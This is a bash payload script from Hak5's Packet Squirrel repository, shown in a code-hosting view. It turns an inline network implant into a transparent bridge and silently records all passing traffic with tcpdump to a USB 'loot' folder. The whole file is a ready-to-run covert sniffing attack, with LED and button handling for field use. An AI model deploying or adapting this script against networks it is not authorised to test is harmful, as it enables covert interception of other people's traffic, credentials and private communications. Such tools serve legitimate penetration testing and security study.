packetsquirrel-payloads/payloads/sniffing/tcpdump/payload

73 lines
1.1 KiB
Plaintext
Raw Permalink Normal View History

2017-10-19 05:12:05 +00:00
#!/bin/bash
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# LEDs
# SUCCESS: Dump complete
# FAIL: No USB storage found
2017-10-19 05:12:05 +00:00
function monitor_space() {
while true
do
[[ $(USB_FREE) -lt 10000 ]] && {
2017-10-19 05:12:05 +00:00
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill TCPDump and sync filesystem
kill $1
wait $1
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p /usb/loot/tcpdump &> /dev/null
2017-10-19 05:12:05 +00:00
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
LED ATTACK
2017-10-19 05:12:05 +00:00
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
2017-10-19 05:12:05 +00:00
tpid=$!
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $tpid
}
# This payload will only run if we have USB storage
# Wait for the USB drive
USB_WAIT
LED ATTACK
run &
monitor_space $! &
wait